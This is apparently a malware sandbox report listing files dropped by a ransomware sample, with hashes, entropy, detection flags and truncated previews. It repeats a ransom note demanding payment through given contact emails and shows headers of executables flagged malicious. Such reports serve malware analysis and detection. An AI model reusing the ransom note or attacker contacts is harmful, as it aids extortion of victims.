                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):64
                                                                                                                                            Entropy (8bit):1.1510207563435464
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Nlllulfp:NllUf
                                                                                                                                            MD5:0FC4FB02A36BD59474720830F64433BA
                                                                                                                                            SHA1:2C635E8F4241E9CB0E464C10E0E101DCC5923F44
                                                                                                                                            SHA-256:AA5847807809D4B8457937617D9F7CE6F70ACF90D26C3A03C2B502E4B9E937D9
                                                                                                                                            SHA-512:995184FFA68FAC0AEE914908F647961B35C05E4176633FB1840E7A9EB73CE93CEAE6563343BB569D2CEF8C93C637F802051027D8F37BC0FCE105342D2D99FCD4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:@...e.................................:..............@..........
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):902856
                                                                                                                                            Entropy (8bit):6.617978034241425
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:py9sG8ih195+OeO+OeNhBBhhBBajWhKR81G9banL73KkHgkgrUid4X9FS45+9voL:py9sG8ih1Lmx73KkAY9F/wvoh3Xfyud
                                                                                                                                            MD5:2B986178DA0C3D081F99AC8FB4A5952C
                                                                                                                                            SHA1:41B53598BFC1BDB21E023B11A49BDAB967203681
                                                                                                                                            SHA-256:A20BDB925E1F673B30DA71C943E9DD460EE68E23B44FE00C8A1B09609804F105
                                                                                                                                            SHA-512:713BF8ECA867755B40067097A2474DB37EB2D4DD60A056AEACE3B3856D7A730A701B474F12B0997A942D0E6B32491CC455F7F3D70B7C6655C8848801C70816B2
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{h.............x......x..r...x......o......o......o......o......x......x..........q....o.......o...............o......Rich....................PE..L...~\cg.....................$......<.............@.......................................@..................................K...........q...............(...`.......b..p...................@c.......b..@...............0............................text............................... ..`.rdata..............................@..@.data...l....`...^...F..............@....rsrc....q.......r..................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):211656
                                                                                                                                            Entropy (8bit):6.682260957753181
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:4pEegLluZoATP/QGdqlhNFIkiFnZDJVvU1nSXZOAg0Fuj0pJgOgpQkV+tpMEaE:4pDyp2AQq3FWFnRehAOXpQkY7MY
                                                                                                                                            MD5:FCCD129F6A5B9D2133D14922A3614F02
                                                                                                                                            SHA1:E814C637E6F0C21F3AA9B43FB92CB161B4D451FC
                                                                                                                                            SHA-256:4B4A87552C44158FB53A72C7294319B0DDDE9F99F460425AD5997D3B9121CD1E
                                                                                                                                            SHA-512:C1594504053BBE2B061880D1FF69819ECA8BDD2BC882B74F415FF8A1515389E32B8D7CD1B931D65B042247FD05DF1751A000D6DA4219427B74E9CDB0E0E52979
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                            Joe Sandbox View:
                                                                                                                                            • Filename: NOTIFICATION_OF_DEPENDANTS.vbs, Detection: malicious, Browse
                                                                                                                                            • Filename: NOTIFICATION_OF_DEPENDANTS.vbs, Detection: malicious, Browse
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.B.5.,.5.,.5.,.F./.8.,.F.)...,.F.(.#.,.g.(.:.,.g./. .,.g.).p.,.F.-.6.,.5.-.J.,...%.7.,....4.,.....4.,.Rich5.,.........................PE..L.....\g...........!................v~.......................................@............@.....................................(........................(... ..........p...............................@...............8............................text............................... ..`.rdata..............................@..@.data...............................@....rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):292
                                                                                                                                            Entropy (8bit):7.299868102259704
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:ZdcGJEK+fexgzgbeJsiS/PjLQtr623gTPx8eHkYmo/lNBXLQoje2QHn:Zdc26TgbeJ2/PjUd4TpJkKaoYHn
                                                                                                                                            MD5:2DFD487477B18325F6550A1723493F7B
                                                                                                                                            SHA1:DD240BC8083A8D63057818BF10C8868BED55B13D
                                                                                                                                            SHA-256:6C7C4F48B022C561BEC149C76DE0AA0907E42E603037E03F9443006C649653AC
                                                                                                                                            SHA-512:590454F54F4EAF4F4ECCCCD2989FD0D289BDD2CA7C90EF528E7E34011C53B5CA3666C99B71290968A096D0F341C06648130294C8790D87E7F5D5077296489DE1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:d.[}.=....}Eu.............2..(.j.I .....s.j........t..../......I;nHn......>...*.>.z.=..a....;..'....G.K..K.f.Z...K......!....l6..mw*X.L.X.N.%......+..d..7..._./hO..u.f.nB.....O.Jr.0....1.pG...~U$..\w.)t}]@..2.3.Cik.{Q.......Lb.*..e...-...d......n%.k..5.C...?..Z.......0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
